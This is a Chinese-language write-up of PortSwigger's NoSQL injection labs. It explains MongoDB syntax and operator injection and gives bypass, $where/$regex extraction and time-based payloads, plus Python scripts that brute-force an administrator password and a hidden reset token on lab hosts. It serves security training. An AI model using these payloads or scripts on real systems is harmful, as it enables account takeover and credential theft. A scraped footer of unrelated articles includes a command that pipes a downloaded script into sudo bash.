【NoSQL】portswigger NoSQL注入 labs 全解

目录

NoSQL

NoSQL 数据库模型

NoSQL 注入的类型

NoSQL 语法注入

检测 MongoDB 中的语法注入

lab1:检测 NoSQL 注入

NoSQL 运算符注入

提交查询运算符

检测 MongoDB 中的运算符注入

lab2:利用 NoSQL 运算符注入绕过身份验证

利用语法注入来提取数据

MongoDB 中的数据泄露

 lab3:利用 NoSQL 注入提取数据

利用 NoSQL 运算符注入来提取数据

在 MongoDB 中注入运算符

lab4:利用 NoSQL 运算符注入来提取未知字段

基于时间的注入


NoSQL

NoSQL 数据库以不同于传统 SQL 关系表的格式存储和检索数据。它们旨在处理大量非结构化或半结构化数据。因此,它们的关系约束和一致性检查通常比 SQL 少,并且在可扩展性、灵活性和性能方面具有显著优势。

与 SQL 数据库一样,用户使用应用程序传递给数据库的查询与 NoSQL 数据库中的数据进行交互。但是,不同的 NoSQL 数据库使用各种查询语言,而不是像 SQL(结构化查询语言)这样的通用标准。这可能是自定义查询语言或 XML 或 JSON 等通用语言。

NoSQL 数据库模型

NoSQL数据库种类繁多,为了检测NoSQL数据库中的漏洞,了解其模型框架和语言会有所帮助。

一些常见的 NoSQL 数据库类型包括:

  • 文档存储 - 这些将数据存储在灵活的半结构化文档中。它们通常使用 JSON、BSON 和 XML 等格式,并使用 API 或查询语言进行查询。示例包括 MongoDB 和 Couchbase。
  • 键值存储 - 这些以键值格式存储数据。每个数据字段都与一个唯一的键字符串相关联。根据唯一键检索值。示例包括 Redis 和 Amazon DynamoDB。
  • 宽列存储 - 这些将相关数据组织到灵活的列族中,而不是传统的行中。示例包括 Apache Cassandra 和 Apache HBase。
  • 图形数据库 - 这些数据库使用节点来存储数据实体,使用边来存储实体之间的关系。示例包括 Neo4j 和 Amazon Neptune。

NoSQL 注入的类型

NoSQL 注入有两种不同类型:

  • 语法注入 - 当您可以破坏 NoSQL 查询语法时,就会发生这种情况,从而使您可以注入自己的有效负载。 该方法与SQL 注入中使用的方法类似。 但是,攻击的性质差异很大,因为 NoSQL 数据库使用多种查询语言、查询语法类型和不同的数据结构。
  • 运算符注入 - 当您可以使用 NoSQL 查询运算符来操作查询时会发生这种情况。

NoSQL 语法注入

您可以通过尝试破坏查询语法来检测 NoSQL 注入漏洞。为此,请系统地测试每个输入,方法是提交模糊字符串和特殊字符,如果应用程序未对其进行充分清理或过滤,则会触发数据库错误或其他可检测的行为。

如果您知道目标数据库的 API 语言,请使用与该语言相关的特殊字符和模糊字符串。否则,请使用各种模糊字符串来定位多种 API 语言。

检测 MongoDB 中的语法注入

确定处理哪些字符

要确定应用程序将哪些字符解释为语法,您可以注入单个字符。例如,您可以提交',这将导致以下 MongoDB 查询:

this.category == '''

如果这导致原始响应发生变化,则可能表明该'字符破坏了查询语法并导致语法错误。您可以通过在输入中提交有效的查询字符串来确认这一点,例如通过转义引号:

this.category == '\''

如果这不会导致语法错误,则可能意味着该应用程序容易受到注入攻击。

确认条件行为

检测到漏洞后,下一步是确定是否可以使用 NoSQL 语法影响布尔条件。

要测试这一点,请发送两个请求,一个条件为假,一个条件为真。例如,您可以使用条件语句

 ' && 0 && 'x,' && 1 && 'x

如下所示:

https://insecure-website.com/product/lookup?category=fizzy'+%26%26+0+%26%26+'xhttps://insecure-website.com/product/lookup?category=fizzy'+%26%26+1+%26%26+'x

如果应用程序的行为有所不同,则表明假条件会影响查询逻辑,而真条件则不会。这表明注入这种语法会影响服务器端查询。

覆盖现有条件

现在您已经确定可以影响布尔条件,您可以尝试覆盖现有条件来利用该漏洞。例如,您可以注入始终求值为 true 的 JavaScript 条件,例如 

'||1||'
https://insecure-website.com/product/lookup?category=fizzy%27%7c%7c%31%7c%7c%27

这导致以下 MongoDB 查询:

this.category == 'fizzy'||'1'=='1'

由于注入的条件始终为真,修改后的查询将返回所有项目。这使您可以查看任何类别中的所有产品,包括隐藏或未知类别。

lab1:检测 NoSQL 注入

点击Gifts分类,抓包

 传一个'直接报500

/filter?category='

 转义引号后回到正常回显

/filter?category=\'

 url编码后打入

/filter?category=Gifts'&& 0 && 'x

 url编码后打入

/filter?category=Gifts'&& 1 && 'x

可以看到正常返回了gifts的页面 

打入

/filter?category=Gifts'||1||'

会发现多出了其他的商品

NoSQL 运算符注入

NoSQL 数据库经常使用查询运算符,这些运算符提供了指定数据必须满足的条件才能包含在查询结果中的方法。MongoDB 查询运算符的示例包括:

  • $where- 匹配满足 JavaScript 表达式的文档。
  • $ne- 匹配所有不等于指定值的值。
  • $in- 匹配数组中指定的所有值。
  • $regex- 选择值与指定正则表达式匹配的文档。

您可能能够注入查询运算符来操纵 NoSQL 查询。为此,系统地将不同的运算符提交到一系列用户输入中,然后检查响应中是否存在错误消息或其他更改。

提交查询运算符

在 JSON 消息中,您可以将查询运算符作为嵌套对象插入。例如,{"username":"wiener"}成为{"username":{"$ne":"invalid"}}

对于基于 URL 的输入,您可以通过 URL 参数插入查询运算符。例如,username=wiener成为 username[$ne]=invalid。如果这不起作用,您可以尝试以下操作:

  1. 将请求方法从 转换GETPOST
  2. Content-Type标题改为application/json
  3. 将 JSON 添加至消息正文。
  4. 在 JSON 中注入查询运算符。

检测 MongoDB 中的运算符注入

考虑一个存在漏洞的应用程序,它在请求正文中接受用户名和密码POST

{"username":"wiener","password":"peter"}

使用一系列运算符测试每个输入。例如,要测试用户名输入是否处理查询运算符,您可以尝试以下注入:

{"username":{"$ne":"invalid"},"password":{"peter"}}

如果$ne应用了 运算符,这将查询用户名不等于invalid的所有用户。

如果用户名和密码输入都处理操作员,则可以使用以下有效载荷绕过身份验证:

{"username":{"$ne":"invalid"},"password":{"$ne":"invalid"}}

此查询返回用户名和密码均不等于invalid的所有登录凭据。因此,您作为集合中的第一个用户登录到应用程序。

要定位某个帐户,您可以构建一个包含已知用户名或您猜到的用户名的有效负载。例如:

{"username":{"$in":["admin","administrator","superadmin"]},"password":{"$ne":""}}

lab2:利用 NoSQL 运算符注入绕过身份验证

先是wiener:peter登录,抓包

payload:

{"username":{"$ne":""},"password":"peter"}

 成功登录

打正则

payload:

{"username":{"$regex":"wien.*"},"password":"peter"}

发现也是以wiener登录 

payload:

{"username":{"$regex":"admin.*"},"password":{"$ne":""}}

 成功以admin登录

利用语法注入来提取数据

在许多 NoSQL 数据库中,某些查询运算符或函数可以运行有限的 JavaScript 代码,例如 MongoDB 的$where运算符和mapReduce()函数。这意味着,如果易受攻击的应用程序使用这些运算符或函数,数据库可能会将 JavaScript 作为查询的一部分进行评估。因此,您可能能够使用 JavaScript 函数从数据库中提取数据。

MongoDB 中的数据泄露

假设有一个存在漏洞的应用程序,它允许用户查找其他已注册的用户名并显示其角色。这会触发对 URL 的请求:

https://insecure-website.com/user/lookup?username=admin

这会导致对集合进行以下 NoSQL 查询users

{"$where":"this.username == 'admin'"}

由于查询使用了$where运算符,您可以尝试将 JavaScript 函数注入此查询,以便它返回敏感数据。例如,您可以发送以下有效负载:

admin' && this.password[0] == 'a' || 'a'=='b

这将返回用户密码字符串的第一个字符,使您能够逐个字符地提取密码。

你也可以使用 JavaScript的match()函数来提取信息。例如,以下有效负载可让你识别密码是否包含数字:

admin' && this.password.match(/\d/) || 'a'=='b

 lab3:利用 NoSQL 注入提取数据

wiener:peter登录

抓包,在myaccount界面forward两次,抓到查询用户信息的api的包

 url编码后打入payload: 

发现存在注入

administrator' && '1'=='1

 测出administrator的密码长度为8

administrator' && this.password.length < 9 || 'a'=='b
administrator' && this.password.length < 8 || 'a'=='b

写个脚本爆破出密码

import requests
import urllib.parse  # 导入 urllib 模块以进行 URL 编码# 创建会话
def create_session():session = requests.session()session.headers.update({"Cookie": "session=bXFWRsjv2sYUTid0NrBr17f6b7zstK2d"})return session# 生成并URL编码payload
def generate_payload(l, char):raw_payload = "administrator' && this.password[{}]=='{}".format(l, char)encoded_payload = urllib.parse.quote(raw_payload)  # 将 payload 进行 URL 编码return encoded_payload# 发送请求并检查响应
def check_password(session, url, payload):response = session.get(url + payload)print(f"请求 payload: {payload} -> 回显: {response.text[:100]}...")  # 打印每次请求的回显return 'admin@normal-user.net' in response.text# 主函数执行流程
def main():s = create_session()url = "https://0a3a0010048732a880c5995500320029.web-security-academy.net/user/lookup?user="payloads = 'abcdefghijklmnopqrstuvwxyz1234567890'password = ''for l in range(0, 8):  # 假设密码为8位for i in payloads:payload = generate_payload(l, i)if check_password(s, url, payload):password += iprint(f'找到第 {l+1} 位: {i}')  # 打印成功爆破出的密码位break  # 找到匹配字符后跳出当前循环print('完整密码:', password)# 运行主函数
if __name__ == "__main__":main()

administrator/rufvfnbl成功登录 

 

利用 NoSQL 运算符注入来提取数据

即使原始查询未使用任何允许您运行任意 JavaScript 的运算符,您也可能能够自行注入其中一个运算符。然后,您可以使用布尔条件来确定应用程序是否执行您通过此运算符注入的任何 JavaScript。

在 MongoDB 中注入运算符

考虑一个存在漏洞的应用程序,它在请求正文中接受用户名和密码POST

{"username":"wiener","password":"peter"}

要测试是否可以注入运算符,您可以尝试将$where运算符添加为附加参数,然后发送一个条件计算结果为 false 的请求,以及另一个条件计算结果为 true 的请求。例如:

{"username":"wiener","password":"peter", "$where":"0"}{"username":"wiener","password":"peter", "$where":"1"}

如果响应之间存在差异,则可能表明$where正在评估子句中的 JavaScript 表达式。

提取字段名称

如果您注入了可运行 JavaScript 的运算符,则可能能够使用该keys()方法提取数据字段的名称。例如,您可以提交以下有效负载:

"$where":"Object.keys(this)[0].match('^.{0}a.*')"

这将检查用户对象中的第一个数据字段并返回字段名称的第一个字符。这使您可以逐个字符地提取字段名称。

使用运算符窃取数据

或者,您可以使用不允许运行 JavaScript 的运算符 $regex来提取数据。例如,您可以使用运算符逐个字符地提取数据。

假设有一个存在漏洞的应用程序,它在请求正文中接受用户名和密码POST。例如:

{"username":"myuser","password":"mypass"}

您可以首先测试该$regex运算符是否按如下方式处理:

{"username":"admin","password":{"$regex":"^.*"}}

如果对此请求的响应与您提交错误密码时收到的响应不同,则表明该应用程序可能存在漏洞。您可以使用$regex运算符逐个字符提取数据。例如,以下有效负载检查密码是否以 开头 a

{"username":"admin","password":{"$regex":"^a*"}}

lab4:利用 NoSQL 运算符注入来提取未知字段

注意到登录时以下两个payload都是正确的,回显账号被锁定,需要重置密码

{"username":"carlos","password":{"$ne":""}}
{"username":"carlos","password":{"$ne":""},"$where":"function(){return 1;}"}

 如果return 0的话就是返回invalid

{"username":"carlos","password":{"$ne":""},"$where":"function(){return 0;}"}

 根据这个写脚本爆出隐藏的字段&字段值

先去重置密码

 

此时会多出一个hidden字段

经过尝试,0字段为_id,1字段为username,2字段为password,3字段为email,4字段就是hidden字段

测出字段长度为9

{"username":"carlos","password":{"$ne":""},"$where":"function(){if(Object.keys(this)[4].length==9)return 1; else 0;}"}

写脚本跑出字段名为changePwd

import requests
import string# 初始化
url = "https://0a9300730318d3e881c16bed000300bf.web-security-academy.net/login"
headers = {"Host": "0a9300730318d3e881c16bed000300bf.web-security-academy.net","Cookie": "session=cmfecICeL6V2kSTVAkR315UykE1HruUF","Content-Type": "application/json","Origin": "https://0a9300730318d3e881c16bed000300bf.web-security-academy.net","Referer": "https://0a9300730318d3e881c16bed000300bf.web-security-academy.net/login"
}# 字母数字组合
characters = string.ascii_letters + string.digits# 构建用户名和初始密码
username = "carlos"
password = ""  # 逐步拼接的密码# 逐位爆破密码
while len(password) < 9:for char in characters:attempt = password + char  # 在当前密码基础上追加一个字符进行测试data = {"username": username,"password": {"$ne": ""},"$where": f"function(){{if(Object.keys(this)[4].match(/^{attempt}/))return 1; else 0;}}"}response = requests.post(url, headers=headers, json=data)# 打印每次尝试的字符和响应print(f"尝试: {attempt}, 返回: {response.text[:100]}...")# 如果返回结果中包含"reset",表示找到正确字符if "reset" in response.text:password += char  # 保存成功的字符print(f"找到字符: {char}, 当前密码: {password}")break  # 找到正确字符后,开始下一位的测试print(f"完整找到的密码: {password}")

 

再测出字段值的长度为16

{"username":"carlos","password":{"$ne":""},"$where":"function(){if(this.changePwd.length==16)return 1; else 0;}"}

 

 微调一下脚本,爆出字段值为3a943a87ebcaad81

import requests
import string# 初始化
url = "https://0a9300730318d3e881c16bed000300bf.web-security-academy.net/login"
headers = {"Host": "0a9300730318d3e881c16bed000300bf.web-security-academy.net","Cookie": "session=cmfecICeL6V2kSTVAkR315UykE1HruUF","Content-Type": "application/json","Origin": "https://0a9300730318d3e881c16bed000300bf.web-security-academy.net","Referer": "https://0a9300730318d3e881c16bed000300bf.web-security-academy.net/login"
}# 字母数字组合
characters = string.digits + string.ascii_letters# 构建用户名和初始密码
username = "carlos"
password = ""  # 逐步拼接的密码# 逐位爆破密码
while len(password) < 16:for char in characters:attempt = password + char  # 在当前密码基础上追加一个字符进行测试data = {"username": username,"password": {"$ne": ""},"$where": f"function(){{if(this.changePwd.match(/^{attempt}/))return 1; else 0;}}"}response = requests.post(url, headers=headers, json=data)# 打印每次尝试的字符和响应print(f"尝试: {attempt}, 返回: {response.text[:100]}...")# 如果返回结果中包含"reset",表示找到正确字符if "reset" in response.text:password += char  # 保存成功的字符print(f"找到字符: {char}, 当前密码: {password}")break  # 找到正确字符后,开始下一位的测试print(f"完整找到的密码: {password}")

回到浏览器,加上?changePwd=3a943a87ebcaad81

修改密码为123456

 最后carlos/123456成功登录

基于时间的注入

有时触发数据库错误不会导致应用程序响应发生变化。在这种情况下,您仍然可以通过使用 JavaScript 注入触发条件时间延迟来检测和利用该漏洞。

要进行基于时间的 NoSQL 注入:

  1. 多次加载页面以确定基准加载时间。
  2. 将基于时间的有效负载插入输入。基于时间的有效负载在执行时会导致响应故意延迟。例如,{"$where": "sleep(5000)"}成功注入后会故意延迟 5000 毫秒。
  3. 确定响应加载是否变慢。这表示注入成功。

如果密码包含字母,以下基于时间的有效载荷将触发时间延迟a

admin'+function(x){var waitTill = new Date(new Date().getTime() + 5000);while((x.password[0]==="a") && waitTill > new Date()){};}(this)+'
admin'+function(x){if(x.password[0]==="a"){sleep(5000)};}(this)+'

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/440396.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Golang | Leetcode Golang题解之第446题等差数列划分II-子序列

题目&#xff1a; 题解&#xff1a; func numberOfArithmeticSlices(nums []int) (ans int) {f : make([]map[int]int, len(nums))for i, x : range nums {f[i] map[int]int{}for j, y : range nums[:i] {d : x - ycnt : f[j][d]ans cntf[i][d] cnt 1}}return }

Ubuntu 搭建 GitLab

1. 安装依赖&#xff1a; sudo apt update sudo apt install -y curl openssh-server ca-certificates2. 添加 GitLab 包仓库&#xff1a; curl https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh | sudo bash3. 安装 GitLab&#xff1a; s…

UE5数字人制作平台使用及3D模型生成

第10章 数字人制作平台使用及3D模型生成 在数字娱乐、虚拟现实&#xff08;VR&#xff09;、增强现实&#xff08;AR&#xff09;等领域&#xff0c;高质量的3D模型是数字内容创作的核心。本章将引导你了解如何使用UE5&#xff08;Unreal Engine 5&#xff09;虚幻引擎这一强大…

多模态大语言模型(MLLM)-Blip2深度解读

前言 Blip2是一个多模态大语言模型&#xff0c;因其提出时间较早&#xff08;2023年&#xff09;&#xff0c;且效果较好&#xff0c;很快成为一个标杆性工作。Blip2中提出的Q-former也成为衔接多模态和文本的重要桥梁。 Blip2发表时间是2023年&#xff0c;现在引用已经3288了…

【AIGC】ChatGPT是如何思考的:探索CoT思维链技术的奥秘

博客主页&#xff1a; [小ᶻZ࿆] 本文专栏: AIGC | ChatGPT 文章目录 &#x1f4af;前言&#x1f4af;什么是CoT思维链CoT思维链的背景与技术发展需求 &#x1f4af;CoT思维链的工作原理&#x1f4af;CoT思维链的应用领域&#x1f4af;CoT思维链的优势&#x1f4af;CoT思维…

【JavaEE】【多线程】进程与线程的概念

目录 进程系统管理进程系统操作进程进程控制块PCB关键属性cpu对进程的操作进程调度 线程线程与进程线程资源分配线程调度 线程与进程区别线程简单操作代码创建线程查看线程 进程 进程是操作系统对一个正在运行的程序的一种抽象&#xff0c;可以把进程看做程序的一次运行过程&a…

【EXCEL数据处理】000014 案例 EXCEL分类汇总、定位和创建组。附多个操作案例。

前言&#xff1a;哈喽&#xff0c;大家好&#xff0c;今天给大家分享一篇文章&#xff01;创作不易&#xff0c;如果能帮助到大家或者给大家一些灵感和启发&#xff0c;欢迎收藏关注哦 &#x1f495; 目录 【EXCEL数据处理】000014 案例 EXCEL分类汇总、定位和创建组。附多个操…

SpringBoot MyBatis连接数据库设置了encoding=utf-8还是不能用中文来查询

properties的MySQL连接时已经指定了字符编码格式&#xff1a; url: jdbc:mysql://localhost:3306/sky_take_out?useUnicodetrue&characterEncodingutf-8使用MyBatis查询&#xff0c;带有中文参数&#xff0c;查询出的内容为空。 执行的语句为&#xff1a; <select id&…

LeetCode讲解篇之139. 单词拆分

文章目录 题目描述题解思路题解代码题目链接 题目描述 题解思路 我们使用一个数组记录字符串s在[0, i)区间能否使用wordDict组成 我们使用左右指针遍历字符串s的子串&#xff0c;左指针 j 为子串的左端点下标&#xff0c;右指针 i 为右端点下标的下一个 遍历过程中如果字符串s…

怎么成为年薪53万的AI产品经理?我分析了200份大厂的招聘要求

我在 BOSS 直聘搜索AI产品经理&#xff0c;筛选了公司规模在10000人以上的公司&#xff0c;清洗整理后得到 229 个岗位信息&#xff0c;分析得到如下信息&#xff1a; 按最低薪资算&#xff0c;平均年薪 40.2 万&#xff1b;取薪资范围均值&#xff0c;平均年薪 52.9 万;只有 …

(PyTorch) 深度学习框架-介绍篇

前言 在当今科技飞速发展的时代&#xff0c;人工智能尤其是深度学习领域正以惊人的速度改变着我们的世界。从图像识别、语音处理到自然语言处理&#xff0c;深度学习技术在各个领域都取得了显著的成就&#xff0c;为解决复杂的现实问题提供了强大的工具和方法。 PyTorch 是一个…

消费者Rebalance机制

优质博文&#xff1a;IT-BLOG-CN 一、消费者Rebalance机制 在Apache Kafka中&#xff0c;消费者组 Consumer Group会在以下几种情况下发生重新平衡Rebalance&#xff1a; 【1】消费者加入或离开消费者组&#xff1a; 当一个新的消费者加入消费者组或一个现有的消费者离开消费…

人机协作:科技与人类智慧的融合

随着科技的飞速发展&#xff0c;越来越多的领域开始借助人工智能&#xff08;AI&#xff09;和自动化技术来提升工作效率。人机协作&#xff08;Human-Machine Collaboration&#xff09;这一概念逐渐成为现代技术进步的核心。它不仅改变了我们的工作方式&#xff0c;也在重新定…

智能家居有哪些产品?生活中常见的人工智能有哪些?

智能家居有哪些产品? 1、智能照明设备类&#xff1a;智能开关、智能插座、灯控模块、智能空开、智能灯、无线开关。 2、家庭安防类&#xff1a;智能门锁、智能摄像机、智能猫眼、智能门铃。 3、智能传感器类&#xff1a;烟雾传感器、可燃气体传感器、水浸传感器、声光报警器…

舵机驱动详解(模拟/数字 STM32)

目录 一、介绍 二、模块原理 1.舵机驱动原理 2.引脚描述 三、程序设计 main.c文件 servo.h文件 servo.c文件 四、实验效果 五、资料获取 项目分享 一、介绍 舵机(Servo)是在程序的控制下&#xff0c;在一定范围内连续改变输出轴角度并保持的电机系统。即舵机只支持…

【ADC】噪声(1)噪声分类

概述 本文学习于TI 高精度实验室课程&#xff0c;总结 ADC 的噪声分类&#xff0c;并简要介绍量化噪声和热噪声。 文章目录 概述一、ADC 中的噪声类型二、量化噪声三、热噪声四、量化噪声与热噪声对比 一、ADC 中的噪声类型 ADC 固有噪声由两部分组成&#xff1a;第一部分是量…

鸿蒙开发(NEXT/API 12)【穿戴设备传感器获取】手机侧应用开发

手机侧应用可以通过Wear Engine获取穿戴设备上的传感器信息&#xff0c;并通过打开、关闭命令控制获取传感器数据。 使用传感器相关接口前&#xff0c;需要向手机侧用户申请获取对应权限的授权 传感器类型申请权限ECG、PPG、HR[HEALTH_SENSOR]人体传感器ACC、GYRO、MAG[MOTIO…

C#医学影像分析源码,医院影像中心PACS系统源码

医学影像系统源码&#xff0c;影像诊断系统PACS源码&#xff0c;C#语言&#xff0c;C/S架构的PACS系统全套源代码。 PACS系统是医院影像科室中应用的一种系统&#xff0c;主要用于获取、传输、存档和处理医学影像。它通过各种接口&#xff0c;如模拟、DICOM和网络&#xff0c;以…

计算机毕业设计 玩具租赁系统的设计与实现 Java实战项目 附源码+文档+视频讲解

博主介绍&#xff1a;✌从事软件开发10年之余&#xff0c;专注于Java技术领域、Python人工智能及数据挖掘、小程序项目开发和Android项目开发等。CSDN、掘金、华为云、InfoQ、阿里云等平台优质作者✌ &#x1f345;文末获取源码联系&#x1f345; &#x1f447;&#x1f3fb; 精…

通信工程学习:什么是RARP反向地址解析协议

RARP&#xff1a;反向地址解析协议 RARP&#xff08;Reverse Address Resolution Protocol&#xff0c;反向地址解析协议&#xff09;是一种网络协议&#xff0c;其主要作用是在设备只知道物理地址&#xff08;如MAC地址&#xff09;时&#xff0c;允许其从网关服务器的地址解析…